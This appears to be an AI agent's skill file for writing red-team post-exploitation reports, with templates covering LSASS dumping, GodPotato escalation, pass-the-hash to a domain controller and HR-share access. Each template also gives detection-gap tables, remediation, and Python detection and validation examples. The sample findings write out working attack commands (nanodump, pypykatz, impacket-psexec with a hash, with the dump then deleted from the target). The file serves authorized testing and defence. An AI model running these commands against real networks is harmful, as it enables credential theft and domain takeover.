# post-exploit-reporting
Post-exploitation finding documentation — credential access, privilege escalation, lateral movement reports, detection gap analysis, attack path documentation, CVSS v4.0 scoring.
| name | post-exploit-reporting |
| description | Post-exploitation finding documentation — credential access, privilege escalation, lateral movement reports, detection gap analysis, attack path documentation, CVSS v4.0 scoring. |
| allowed-tools | Read Write |
| metadata | {"subdomain":"reporting","kind":"reporting","when_to_use":"write finding, document escalation, lateral movement report, credential found, detection gap, attack path, post-exploit report","tags":"report, post-exploit, findings, privesc, lateral, creds, detection-gap, attack-path","mitre_attack":null} |
Post-exploitation findings require richer documentation than reconnaissance findings because they demonstrate real-world impact, test Blue Team detection capabilities, and map the full kill chain traversal. This skill provides phase-specific templates and detection gap analysis guidance aligned with PTES, CREST, and TIBER-EU standards.
All agent-authored documents MUST be Markdown format (.md). Operational data files (creds/*.json, network_map.json) are exceptions.
Each post-exploitation phase has a specialized template. All templates share the same YAML frontmatter schema but differ in body sections to capture phase-relevant details.
---
id: FIND-007
severity: high
cvss_score: 8.4
cvss_vector: "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:N/SA:N"
cwe: CWE-522
mitre: [T1003.001]
affected_target: "WEB01 (10.0.0.5)"
affected_component: "LSASS process memory"
confidence: verified
objective_id: OBJ-004
phase: post-exploit
agent: postexploit
detected: false
remediation_priority: immediate
discovered_at: "2026-04-06T16:45:00Z"
---
# [HIGH] LSASS Memory Dump on WEB01 exposes Domain Credentials
## Description
LSASS process memory was dumped on WEB01 (10.0.0.5) using nanodump, yielding NTLM hashes for 3 domain accounts including a service account with Domain Admin group membership.
## Steps to Reproduce
1. From SYSTEM shell on WEB01:
```
nanodump --write C:\Windows\Temp\debug.dmp --valid
```
2. Transfer the dump to the attack host over SMB. impacket-smbclient takes `[domain/]user@target`, not a UNC path; this assumes an account with local admin rights on WEB01 and a Kerberos ticket already exported in KRB5CCNAME (hence `-k -no-pass`). Lines after the first are typed at the smbclient prompt; the final `rm` removes the dump from the target once it has been copied:
```
impacket-smbclient corp.local/<admin-user>@10.0.0.5 -k -no-pass
# use C$
# cd Windows\Temp
# get debug.dmp
# rm debug.dmp
```
3. Extract credentials with pypykatz:
```
pypykatz lsa minidump debug.dmp
```
## Credentials Obtained
| Username | Type | Hash/Value | Source Host | Domain | Privilege |
|----------|------|-----------|-------------|--------|-----------|
| svc_sql | NTLM | aad3b435...7cb | WEB01 | corp.local | Domain Admin |
| jdoe | NTLM | e19ccf75...2a1 | WEB01 | corp.local | Domain User |
| web_app | NTLM | 31d6cfe0...e0d | WEB01 | corp.local | Domain User |
## Impact
The `svc_sql` account is a member of the Domain Admins group. With this NTLM hash, an attacker can perform Pass-the-Hash to gain full control over the Active Directory domain, including all domain-joined systems and data.
## Evidence
| Type | Path | Description |
|------|------|-------------|
| terminal-log | findings/evidence/FIND-007_nanodump.txt | nanodump execution output |
| terminal-log | findings/evidence/FIND-007_pypykatz.txt | pypykatz credential extraction |
## Detection Gap Analysis
| Control | Fired? | Notes |
|---------|--------|-------|
| EDR (CrowdStrike) | No | nanodump evaded userland hooks via direct syscalls |
| SIEM | No | No alert for LSASS access or suspicious process creation |
| Windows Event Log | Partial | Event 4663 logged but not forwarded to SIEM |
| Network monitoring | No | SMB transfer blended with normal traffic |
Blue team detection status: **Not detected**. LSASS access via direct syscalls bypassed EDR userland hooks entirely.
## Remediation
1. Enable Credential Guard so that NTLM hashes and Kerberos keys for domain logons are isolated in the VBS-protected LSAIso process and no longer appear in LSASS memory (it does not block the dump itself; it removes the domain secrets from it).
2. Enable LSA Protection (RunAsPPL) so LSASS runs as a protected process, and verify that the EDR observes LSASS handle requests from its kernel driver (object callbacks) rather than from userland hooks, which direct syscalls bypass. nanodump ships PPL bypass options, so treat PPL as defence in depth rather than a complete control.
3. Forward Windows Security Event 4663 (object access) to the SIEM and add Sysmon Event 10 (ProcessAccess) for lsass.exe with an allowlist of known readers; alert on any other process requesting read access.
4. Review service accounts: `svc_sql` should NOT be Domain Admin. Apply least privilege, for example a group-managed service account holding only the rights SQL Server needs.
## References
- MITRE ATT&CK T1003.001: https://attack.mitre.org/techniques/T1003/001/
- Microsoft Credential Guard: https://learn.microsoft.com/en-us/windows/security/identity-protection/credential-guard/
- CWE-522: https://cwe.mitre.org/data/definitions/522.html
---
id: FIND-005
severity: high
cvss_score: 8.5
cvss_vector: "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
cwe: CWE-269
mitre: [T1068]
affected_target: "WEB01 (10.0.0.5)"
affected_component: "Windows Token Privileges"
confidence: verified
objective_id: OBJ-003
phase: post-exploit
agent: postexploit
detected: false
remediation_priority: short-term
discovered_at: "2026-04-06T16:20:00Z"
---
# [HIGH] GodPotato on WEB01 — svc_web (IIS AppPool) to SYSTEM
## Description
The IIS application pool identity `svc_web` holds SeImpersonatePrivilege (IIS grants it to worker processes by default). GodPotato abuses the DCOM/RPCSS service to obtain a SYSTEM token and impersonate it, escalating from the service account to NT AUTHORITY\SYSTEM.
## Steps to Reproduce
1. Confirm SeImpersonatePrivilege:
```
whoami /priv
```
2. Execute GodPotato:
```
GodPotato.exe -cmd "cmd /c whoami > C:\Windows\Temp\whoami.txt"
```
3. Verify SYSTEM access:
```
type C:\Windows\Temp\whoami.txt
# Output: nt authority\system
```
## Privilege Chain
| Step | From | To | Method | Tool |
|------|------|----|--------|------|
| 1 | svc_web (IIS AppPool) | NT AUTHORITY\SYSTEM | Token Impersonation (SeImpersonatePrivilege) | GodPotato |
## Impact
SYSTEM-level access on WEB01 grants full control over the host, including credential extraction from LSASS, access to all local files, and ability to pivot to other network segments.
## Evidence
| Type | Path | Description |
|------|------|-------------|
| terminal-log | findings/evidence/FIND-005_godpotato.txt | GodPotato execution and whoami output |
| terminal-log | findings/evidence/FIND-005_privs.txt | whoami /priv output showing SeImpersonatePrivilege |
## Detection Gap Analysis
| Control | Fired? | Notes |
|---------|--------|-------|
| EDR | No | GodPotato not in signature database |
| SIEM | No | No correlation rule for token impersonation |
| Windows Event Log | Yes | Event 4672 (special privileges) logged but not alerted |
Blue team detection status: **Not detected**. Event 4672 was logged but no alert was configured.
## Remediation
1. Remove SeImpersonatePrivilege from IIS application pool accounts where not required. IIS grants it so worker processes can impersonate authenticated clients, so test the application before removing it.
2. Configure EDR to alert on potato-family privilege escalation patterns: a child process of w3wp.exe (or of any service-account process) running as NT AUTHORITY\SYSTEM, visible in Sysmon Event 1 or Security 4688 with command-line logging enabled.
3. Create a SIEM rule for Event 4672 on servers where privileged logons are not expected. 4672 is noisy on its own, so correlate it with the parent/child process chain above rather than alerting on it alone.
---
id: FIND-008
severity: critical
cvss_score: 9.3
cvss_vector: "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"
cwe: CWE-287
mitre: [T1550.002]
affected_target: "DC01 (10.0.0.1)"
affected_component: "Kerberos / SMB"
confidence: verified
objective_id: OBJ-005
phase: post-exploit
agent: postexploit
detected: false
remediation_priority: immediate
discovered_at: "2026-04-06T17:10:00Z"
---
# [CRITICAL] Lateral Movement via Pass-the-Hash — WEB01 to DC01 (Domain Admin)
## Description
Using the svc_sql NTLM hash obtained from FIND-007, Pass-the-Hash via Impacket's psexec achieved SYSTEM-level access on DC01 (Domain Controller).
## Steps to Reproduce
1. From the attack host, authenticate with the svc_sql NT hash (`-hashes` takes `LM:NT`; an empty LM part is accepted). psexec uploads a service binary to ADMIN$ and registers a service, which is the artifact the Detection Gap Analysis below refers to:
```
impacket-psexec -hashes :aad3b435...7cb corp.local/svc_sql@10.0.0.1
```
2. Verify domain controller access:
```
whoami
# Output: nt authority\system
hostname
# Output: DC01
```
## Movement Details
| Source Host | Target Host | Method | Credentials Used | Access Level |
|------------|-------------|--------|------------------|-------------|
| WEB01 (10.0.0.5) | DC01 (10.0.0.1) | Pass-the-Hash (psexec) | svc_sql NTLM hash | SYSTEM |
## Impact
Full domain compromise. SYSTEM access on the domain controller allows: DCSync for all domain credentials, Group Policy modification, creation of persistence mechanisms (Golden Ticket), and access to all domain-joined systems and data.
## Evidence
| Type | Path | Description |
|------|------|-------------|
| terminal-log | findings/evidence/FIND-008_psexec.txt | psexec session and whoami output |
| terminal-log | findings/evidence/FIND-008_domain_info.txt | Domain info confirming DC role |
## Detection Gap Analysis
| Control | Fired? | Notes |
|---------|--------|-------|
| Network IDS | No | SMB/psexec traffic not flagged |
| EDR on DC01 | Partial | Service creation logged but not correlated with lateral movement |
| SIEM | No | No rule for PtH detection via service creation patterns |
| AD monitoring | No | No alert for svc_sql authenticating to DC01 |
Blue team detection status: **Not detected**. PsExec service creation was logged but not correlated as lateral movement.
## Remediation
1. Remove svc_sql from the Domain Admins group immediately; convert it to a group-managed service account with only the rights SQL Server needs.
2. Deploy Credential Guard on the member servers and workstations where privileged accounts log on (WEB01 in this chain) so their hashes are not recoverable from LSASS. Credential Guard is not supported on domain controllers and would not have stopped this step, since the hash was stolen on WEB01.
3. Ensure Audit Logon success events are collected from DC01 and alert on 4624 LogonType 3 with AuthenticationPackageName NTLM for Tier-0 accounts from any host that is not a designated admin workstation; correlate with System Event 7045 (service install) to catch the psexec pattern.
4. Implement network segmentation: restrict SMB (TCP 445) to domain controllers from non-admin subnets.
5. Deploy Microsoft Defender for Identity (the successor to ATA) for Pass-the-Hash detection, and add Tier-0 accounts to the Protected Users group so they cannot authenticate with NTLM at all.
## References
- MITRE ATT&CK T1550.002: https://attack.mitre.org/techniques/T1550/002/
- Microsoft PtH Mitigation: https://www.microsoft.com/en-us/download/details.aspx?id=36036
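The remediation lists for FIND-007 (alert on unexpected LSASS handle access) and FIND-008 (correlate NTLM network logons with service installs) describe two detections in prose. The following is an added example written for this page, not code from the skill or from any EDR/SIEM product, that implements both as functions over a handful of constructed events shaped like Sysmon Event 10, Security 4624 and System 7045. The allowlist of legitimate LSASS readers, the Tier-0 account set and the admin-workstation addresses are assumptions to be tuned per estate.

```python
"""Two detections for the gaps recorded in FIND-007 and FIND-008.

Added example, not part of this skill or of any EDR/SIEM product. Events are
hand-constructed dicts shaped like Sysmon Event 10 (ProcessAccess), Security
4624 (logon) and System 7045 (service install); field names follow the Windows
event schema, the values are fictional. Allowlists and Tier-0 sets are assumed.
"""
from datetime import datetime

# VM_READ (0x10) for read dumpers, DUP_HANDLE (0x40) for handle-duplication,
# CREATE_PROCESS (0x80) for fork/snapshot dumpers.
SUSPICIOUS_RIGHTS = 0x0010 | 0x0040 | 0x0080
# Assumed legitimate LSASS readers (EDR sensor, Windows itself); tune per estate.
ALLOWED_LSASS_READERS = ("C:\\Program Files\\CrowdStrike\\",
                         "C:\\Windows\\System32\\svchost.exe")
TIER0_ACCOUNTS = {"svc_sql", "Administrator"}  # assumed Tier-0 account list
ADMIN_SOURCES = {"10.0.0.250"}                  # assumed PAW / jump host addresses

# Constructed sample telemetry: one LSASS handle from an unknown binary on WEB01,
# one EDR handle that is allowlisted, an NTLM network logon of svc_sql to DC01
# from WEB01 followed 3 s later by a service install, and a benign machine logon.
EVENTS = [
    {"host": "WEB01", "channel": "Sysmon", "id": 10, "ts": "2026-04-06T16:44:58Z",
     "SourceImage": "C:\\Windows\\Temp\\nd.exe",
     "TargetImage": "C:\\Windows\\System32\\lsass.exe", "GrantedAccess": "0x1FFFFF"},
    {"host": "WEB01", "channel": "Sysmon", "id": 10, "ts": "2026-04-06T16:45:30Z",
     "SourceImage": "C:\\Program Files\\CrowdStrike\\CSFalconService.exe",
     "TargetImage": "C:\\Windows\\System32\\lsass.exe", "GrantedAccess": "0x1010"},
    {"host": "DC01", "channel": "Security", "id": 4624, "ts": "2026-04-06T17:09:40Z",
     "TargetUserName": "svc_sql", "LogonType": "3", "AuthenticationPackageName": "NTLM",
     "IpAddress": "10.0.0.5"},
    {"host": "DC01", "channel": "System", "id": 7045, "ts": "2026-04-06T17:09:43Z",
     "ServiceName": "xyzA", "ImagePath": "%SystemRoot%\\xyzA.exe"},
    {"host": "DC01", "channel": "Security", "id": 4624, "ts": "2026-04-06T17:20:00Z",
     "TargetUserName": "DC01$", "LogonType": "3", "AuthenticationPackageName": "Kerberos",
     "IpAddress": "10.0.0.1"},
]


def parse_ts(value):
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ")


def lsass_access_alerts(events):
    """Sysmon Event 10: a process outside the allowlist opened lsass.exe with
    dump-capable rights. Direct syscalls defeat userland hooks, not the kernel
    object callback Sysmon uses to produce this event."""
    alerts = []
    for e in events:
        if e["channel"] != "Sysmon" or e["id"] != 10:
            continue
        if not e["TargetImage"].lower().endswith("\\lsass.exe"):
            continue
        if e["SourceImage"].startswith(ALLOWED_LSASS_READERS):
            continue
        if int(e["GrantedAccess"], 16) & SUSPICIOUS_RIGHTS:
            alerts.append({"rule": "lsass-access", "host": e["host"],
                           "source": e["SourceImage"], "access": e["GrantedAccess"]})
    return alerts


def pth_lateral_alerts(events, window_seconds=60):
    """4624 LogonType 3 over NTLM for a Tier-0 account from a non-admin source,
    correlated with a 7045 service install on the same host inside the window:
    the psexec pattern FIND-008 left uncorrelated. Machine accounts are ignored."""
    installs = [e for e in events if e["channel"] == "System" and e["id"] == 7045]
    alerts = []
    for e in events:
        if e["channel"] != "Security" or e["id"] != 4624 or e["LogonType"] != "3":
            continue
        user = e["TargetUserName"]
        if user.endswith("$") or e["AuthenticationPackageName"] != "NTLM":
            continue
        if user not in TIER0_ACCOUNTS or e["IpAddress"] in ADMIN_SOURCES:
            continue
        t0 = parse_ts(e["ts"])
        services = [s["ServiceName"] for s in installs if s["host"] == e["host"]
                    and 0 <= (parse_ts(s["ts"]) - t0).total_seconds() <= window_seconds]
        alerts.append({"rule": "pth-lateral", "host": e["host"], "account": user,
                       "source_ip": e["IpAddress"], "services_installed": services,
                       "severity": "critical" if services else "high"})
    return alerts


def run(events):
    return lsass_access_alerts(events) + pth_lateral_alerts(events)


if __name__ == "__main__":
    for alert in run(EVENTS):
        print(alert)
```

The PtH rule deliberately does not try to distinguish a pass-the-hash logon from an ordinary NTLM logon on the wire, because the domain controller sees the same exchange either way; it keys on who authenticated, from where, and what followed. The LSASS rule is only as good as its allowlist: an over-broad path prefix is the easiest way to reopen the gap.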
---
id: FIND-010
severity: high
cvss_score: 8.7
cvss_vector: "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N"
cwe: CWE-200
mitre: [T1039]
affected_target: "FILESVR01 (10.0.0.20)"
affected_component: "HR file share (\\FILESVR01\HR$)"
confidence: verified
objective_id: OBJ-006
phase: exfiltration
agent: postexploit
detected: true
remediation_priority: immediate
discovered_at: "2026-04-06T17:45:00Z"
---
# [HIGH] Sensitive HR Data accessed on FILESVR01 File Share
## Description
Using domain admin credentials, the hidden HR$ share on FILESVR01 was accessed (a trailing `$` only hides the share from browsing; it is not an administrative share and confers no extra protection). The share contains personally identifiable information (PII) including employee SSNs, salary data, and performance reviews for approximately 2,000 employees.
## Data Classification
| Data Type | Volume | Classification | Regulatory |
|-----------|--------|---------------|------------|
| Employee SSNs | ~2,000 records | PII / Restricted | GDPR, CCPA |
| Salary records | ~2,000 records | Confidential | Internal policy |
| Performance reviews | ~500 documents | Confidential | Internal policy |
## Steps to Reproduce
1. Map the HR share with the domain admin credentials (`net use` prompts for a password; with only the NT hash, run the same enumeration from an impacket-smbclient session started with `-hashes`):
```
net use \\FILESVR01\HR$ /user:corp\svc_sql
```
2. List contents:
```
dir \\FILESVR01\HR$\
```
3. Verify PII presence without collecting it (PowerShell; cmd has no `head`). Redact the values before saving the output as evidence, and do NOT exfiltrate real data:
```
Get-Content \\FILESVR01\HR$\employees\sample.csv -TotalCount 5
```
## Impact
Full access to HR data containing PII for ~2,000 employees. In a real attack, this data could be exfiltrated for identity theft, extortion, or sold on dark web markets. Regulatory exposure under GDPR/CCPA.
## Evidence
| Type | Path | Description |
|------|------|-------------|
| terminal-log | findings/evidence/FIND-010_share_listing.txt | Directory listing (filenames only, no PII) |
**Note**: No actual PII was exfiltrated per RoE constraints. Evidence contains directory listings and file metadata only.
## Detection Gap Analysis
| Control | Fired? | Notes |
|---------|--------|-------|
| DLP | No | No DLP agent on file server |
| SIEM | Yes | Alert triggered for admin share access from non-admin workstation |
| File audit | Yes | Windows file access audit logged the access |
Blue team detection status: **Detected** (partial). SIEM alerted on admin share access but response was not within SLA.
## Remediation
1. Restrict HR$ share access to named HR admin accounts only (remove Domain Admins).
2. Deploy DLP agent on file servers containing PII.
3. Implement SIEM playbook for admin share access with 15-minute response SLA.
4. Encrypt or tokenize SSNs at the application/field level. Volume-level encryption at rest does not help against an authenticated Domain Admin reading the share, which is exactly how the data was reached here.
Detection gap analysis is the KEY differentiator of red team reporting versus standard penetration testing. For every finding, document whether Blue Team controls detected the activity.
Every finding MUST include a Detection Gap Analysis section:
## Detection Gap Analysis
| Control | Fired? | Notes |
|---------|--------|-------|
| EDR | Yes/No/Partial/N/A | Specific observation |
| SIEM | Yes/No/Partial/N/A | Alert name or absence |
| IDS/IPS | Yes/No/Partial/N/A | Signature match or miss |
| Network monitoring | Yes/No/Partial/N/A | Traffic analysis observation |
| AD monitoring | Yes/No/Partial/N/A | Identity-based detection |
| DLP | Yes/No/Partial/N/A | Data loss prevention observation |
| Windows Event Log | Yes/No/Partial/N/A | Event IDs logged/missed |
Blue team detection status: **Detected** / **Partially detected** / **Not detected**.
Time to detect: N/A or X minutes/hours.
After all findings are recorded, include a detection gap summary in the final report, or in a dedicated findings/FIND-{NNN}.md when the systemic gap itself is a verified finding. Do not create a legacy findings.md summary file:
## Detection Gap Summary
| Finding | Phase | ATT&CK | Detected | Primary Control | Gap |
|---------|-------|--------|----------|----------------|-----|
| FIND-005 | post-exploit | T1068 | No | EDR | Potato not in signatures |
| FIND-007 | post-exploit | T1003.001 | No | EDR | Direct syscalls bypass hooks |
| FIND-008 | post-exploit | T1550.002 | No | SIEM | No PtH correlation rule |
| FIND-010 | exfiltration | T1039 | Partial | SIEM | Alert fired, slow response |
**Overall Detection Rate**: 1/4 (25%) — partial detection only
**Blind Spots**: Credential access and lateral movement entirely undetected
**Recommendation**: Deploy Credential Guard, implement PtH detection rules, tune EDR for kernel-level monitoring
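Everything above is stated as rules for the agent to follow by hand. The following is an added example, written for this page and not part of the skill, that parses the frontmatter shared by all templates, checks a finding against those rules (required keys, severity consistent with the CVSS v4.0 score band, a Detection Gap Analysis section whose status line agrees with `detected`, evidence files keyed by finding id) and renders the Detection Gap Summary table from a set of findings. The parser covers only the scalar, quoted-string and `[a, b]` list forms the templates use, so no YAML library is needed. The two sample findings are constructed, abbreviated fixtures, and the Primary Control column is derived mechanically as the first control in the finding's table that did not fully fire, which can differ from the analyst's judgement in the summary above.

```python
"""Validate findings/FIND-NNN.md files and build the Detection Gap Summary.
Added example, not part of this skill. It enforces the rules stated on this page:
required frontmatter keys, severity matching the CVSS v4.0 score band, a Detection
Gap Analysis section whose status line agrees with `detected`, and evidence files
keyed by finding id. The two findings below are constructed fixtures. Stdlib only."""
import re

REQUIRED = ("id", "severity", "cvss_score", "cvss_vector", "cwe", "mitre",
            "affected_target", "affected_component", "confidence", "objective_id",
            "phase", "agent", "detected", "remediation_priority", "discovered_at")
BANDS = (("none", 0.0, 0.0), ("low", 0.1, 3.9), ("medium", 4.0, 6.9),
         ("high", 7.0, 8.9), ("critical", 9.0, 10.0))  # CVSS v4.0 qualitative bands
STATUS_RE = re.compile(r"Blue team detection status:\s*\*\*([^*]+)\*\*\s*(\(partial\))?")
ROW_RE = re.compile(r"^\|\s*([^|]+?)\s*\|\s*(Yes|No|Partial|N/A)\s*\|\s*([^|]*?)\s*\|$", re.M)

def parse_frontmatter(doc):
    """Parse the YAML subset the templates use: scalars, quoted strings, [a, b] lists."""
    m = re.match(r"^---\n(.*?)\n---\n(.*)$", doc, re.S)
    if not m:
        raise ValueError("missing frontmatter block")
    meta = {}
    for line in m.group(1).splitlines():
        key, _, raw = line.partition(":")
        key, raw = key.strip(), raw.strip()
        if raw.startswith("[") and raw.endswith("]"):
            meta[key] = [x.strip() for x in raw[1:-1].split(",") if x.strip()]
        elif raw in ("true", "false"):
            meta[key] = raw == "true"
        else:
            try:
                meta[key] = float(raw)
            except ValueError:
                meta[key] = raw.strip('"')
    return meta, m.group(2)

def validate(doc):
    """Return the list of rule violations; an empty list means the finding passes."""
    meta, body = parse_frontmatter(doc)
    problems = [f"missing frontmatter key: {k}" for k in REQUIRED if k not in meta]
    if "cvss_score" in meta and "severity" in meta:
        expected = next(n for n, lo, hi in BANDS if lo <= meta["cvss_score"] <= hi)
        if meta["severity"] != expected:
            problems.append(f"severity {meta['severity']} does not match "
                            f"CVSS {meta['cvss_score']} ({expected})")
    if not str(meta.get("cvss_vector", "")).startswith("CVSS:4.0/"):
        problems.append("cvss_vector is not a CVSS v4.0 vector")
    if "## Detection Gap Analysis" not in body:
        problems.append("missing Detection Gap Analysis section")
    status = STATUS_RE.search(body)
    if not status:
        problems.append("missing 'Blue team detection status' line")
    elif (status.group(1) != "Not detected") != bool(meta.get("detected")):
        problems.append(f"detected: {meta.get('detected')} contradicts "
                        f"status '{status.group(1)}'")
    for path in re.findall(r"findings/evidence/(\S+)", body):
        if not path.startswith(f"{meta.get('id')}_"):
            problems.append(f"evidence file {path} is not keyed by finding id")
    return problems

def summary_table(docs):
    """Render the Detection Gap Summary table and the overall detection rate."""
    rows = ["| Finding | Phase | ATT&CK | Detected | Primary Control | Gap |",
            "|---------|-------|--------|----------|----------------|-----|"]
    hits = 0
    for doc in docs:
        meta, body = parse_frontmatter(doc)
        section = body.split("## Detection Gap Analysis", 1)[1]
        s = STATUS_RE.search(section)
        label = ("No" if s.group(1) == "Not detected" else
                 "Partial" if s.group(2) or s.group(1) == "Partially detected" else "Yes")
        hits += label != "No"
        table = ROW_RE.findall(section)
        # Primary gap = first control that did not fully fire, else the first row.
        control, _, note = next((r for r in table if r[1] != "Yes"), table[0])
        rows.append(f"| {meta['id']} | {meta['phase']} | {', '.join(meta['mitre'])} "
                    f"| {label} | {control} | {note} |")
    rows.append(f"**Overall Detection Rate**: {hits}/{len(docs)} ({100 * hits // len(docs)}%)")
    return "\n".join(rows)

def make_doc(meta, body):
    """Fixture builder for the constructed samples below."""
    return "---\n" + "\n".join(f"{k}: {v}" for k, v in meta.items()) + "\n---\n" + body

BASE = {"cvss_vector": '"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"',
        "cwe": "CWE-269", "affected_target": '"WEB01 (10.0.0.5)"',
        "affected_component": "Windows Token Privileges", "confidence": "verified",
        "objective_id": "OBJ-003", "phase": "post-exploit", "agent": "postexploit",
        "remediation_priority": "short-term", "discovered_at": '"2026-04-06T16:20:00Z"'}
GOOD = make_doc({"id": "FIND-005", "severity": "high", "cvss_score": 8.5,
                 "mitre": "[T1068]", "detected": "false", **BASE}, """# [HIGH] GodPotato on WEB01
## Evidence
| terminal-log | findings/evidence/FIND-005_godpotato.txt | GodPotato output |
## Detection Gap Analysis
| Control | Fired? | Notes |
|---------|--------|-------|
| EDR | No | GodPotato not in signature database |
| Windows Event Log | Yes | Event 4672 logged but not alerted |
Blue team detection status: **Not detected**.
""")
# Deliberately wrong: 9.3 is CRITICAL, and detected: true contradicts the status line.
BAD = make_doc({"id": "FIND-099", "severity": "high", "cvss_score": 9.3,
                "mitre": "[T1550.002]", "detected": "true", **BASE}, """# [HIGH] PtH to DC01
## Detection Gap Analysis
| Control | Fired? | Notes |
|---------|--------|-------|
| SIEM | No | No PtH correlation rule |
Blue team detection status: **Not detected**.
""")
```

Run `validate()` on every findings/FIND-*.md before promoting them to the final report; a non-empty result is a finding that should not ship. `summary_table()` takes the same documents and produces the summary block shown above, so the detection rate is computed from the findings rather than typed in.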
Attack paths connect individual findings into kill chain narratives. Save to findings/attack-paths/PATH-{NNN}.md. Individual findings use findings/FIND-{NNN}.md filenames.
---
id: PATH-001
name: "External Web App to Domain Admin via Token Impersonation and Credential Theft"
combined_severity: critical
finding_ids: [FIND-003, FIND-005, FIND-007, FIND-008]
---
# PATH-001: External Web App to Domain Admin
## Narrative
Starting from an SQL injection vulnerability in the public-facing web application (FIND-003), the attacker gained code execution as the IIS application pool identity. Using GodPotato (FIND-005), privileges were escalated to SYSTEM on the web server. LSASS memory was dumped (FIND-007) revealing the svc_sql Domain Admin NTLM hash. Pass-the-Hash with this hash (FIND-008) yielded SYSTEM access on the domain controller, achieving full domain compromise.
## Attack Path
| Step | Phase | Technique | MITRE | Source | Target | Tool | Detected | Finding |
|------|-------|-----------|-------|--------|--------|------|----------|---------|
| 1 | initial-access | SQL Injection | T1190 | Internet | WEB01:443 | sqlmap | No | FIND-003 |
| 2 | post-exploit | Token Impersonation | T1068 | svc_web | SYSTEM@WEB01 | GodPotato | No | FIND-005 |
| 3 | post-exploit | LSASS Dump | T1003.001 | SYSTEM@WEB01 | LSASS | nanodump | No | FIND-007 |
| 4 | post-exploit | Pass-the-Hash | T1550.002 | WEB01 | DC01 | psexec | No | FIND-008 |
## Chain Severity Assessment
Individual findings range from HIGH to CRITICAL, but the chain achieves full domain compromise from an external position with zero detection — **combined severity: CRITICAL**.
## Detection Summary
0 of 4 steps detected by Blue Team. The entire kill chain from initial access to domain compromise executed without triggering any actionable alert.
## Visual Path
```
Internet ──[SQLi]──> WEB01:443 (svc_web)
│
[GodPotato]
│
WEB01 (SYSTEM)
│
[LSASS dump → svc_sql hash]
│
[Pass-the-Hash]
│
DC01 (SYSTEM) ── DOMAIN COMPROMISED
```
When individual findings chain together, combined severity often exceeds individual scores:
| Chain Pattern | Individual Severities | Combined | Reason |
|---|---|---|---|
| Info Disclosure + Credential Access | Medium + High | CRITICAL | Credentials enable full access |
| PrivEsc + Lateral Movement | High + High | CRITICAL | Domain-wide impact |
| Web Vuln + PrivEsc + Cred Dump + Lateral | High + High + High + High | CRITICAL | Full kill chain, external to DA |
| Weak Config + Info Disclosure | Low + Medium | MEDIUM | Limited blast radius |
Reference CVSS v4.0 vectors for common post-exploitation finding types. Treat them as starting points and recompute with the official FIRST calculator whenever the real context differs from the vector shown; for example, dumping LSASS requires local administrator or SYSTEM rights, so a standalone LSASS finding is PR:H rather than PR:L, with a correspondingly lower score.
| Finding Type | CVSS 4.0 | Vector |
|---|---|---|
| LSASS dump / credential theft | 8.4 | AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:N/SA:N |
| PrivEsc to SYSTEM (token impersonation) | 8.5 | AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N |
| PrivEsc to SYSTEM (kernel exploit) | 8.5 | AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N |
| Lateral movement to DC (PtH) | 9.3 | AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H |
| Kerberoastable SPN (crackable) | 7.7 | AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N |
| AS-REP roasting | 7.7 | AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N |
| DCSync | 9.3 | AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H |
| Unrestricted file share access (PII) | 8.7 | AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N |
| Weak AD config (no LAPS) | 6.9 | AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N |
ATT&CK mapping for credential access techniques:
| ID | Technique | Common Tools |
|---|---|---|
| T1003.001 | OS Credential Dumping: LSASS Memory | nanodump, Mimikatz, pypykatz |
| T1003.002 | OS Credential Dumping: SAM | secretsdump, reg save |
| T1003.003 | OS Credential Dumping: NTDS | secretsdump -ntds, ntdsutil, vssadmin (ntds.dit + SYSTEM hive) |
| T1003.006 | OS Credential Dumping: DCSync | Mimikatz (lsadump::dcsync), secretsdump |
| T1558.003 | Kerberoasting | Rubeus, Impacket |
| T1558.004 | AS-REP Roasting | Rubeus, Impacket |
| T1552.001 | Credentials in Files | manual search, Snaffler |
| T1555 | Credentials from Password Stores | Mimikatz (DPAPI) |
ATT&CK mapping for privilege escalation techniques:
| ID | Technique | Common Tools |
|---|---|---|
| T1068 | Exploitation for Privilege Escalation | GodPotato, PrintSpoofer, JuicyPotato |
| T1134.001 | Token Impersonation | Incognito, SweetPotato |
| T1548.002 | UAC Bypass | UACME, fodhelper |
| T1078.002 | Valid Accounts: Domain | Cached credentials |
ATT&CK mapping for lateral movement techniques:
| ID | Technique | Common Tools |
|---|---|---|
| T1550.002 | Pass-the-Hash | psexec, wmiexec, smbexec |
| T1550.003 | Pass-the-Ticket | Rubeus, Mimikatz |
| T1021.001 | Remote Desktop Protocol | xfreerdp, rdesktop |
| T1021.002 | SMB/Windows Admin Shares | CrackMapExec, NetExec |
| T1021.006 | Windows Remote Management | Evil-WinRM |
| T1047 | WMI | wmiexec, CrackMapExec |
Before completing a post-exploitation objective, verify:
- [ ] Credentials saved to post-exploit/creds/ AND a corresponding findings/FIND-{NNN}.md finding created
- [ ] Evidence saved as findings/evidence/FIND-{NNN}_{description}.txt
- [ ] findings/FIND-{NNN}.md document written with full frontmatter and a Detection Gap Analysis section
- [ ] timeline.jsonl updated
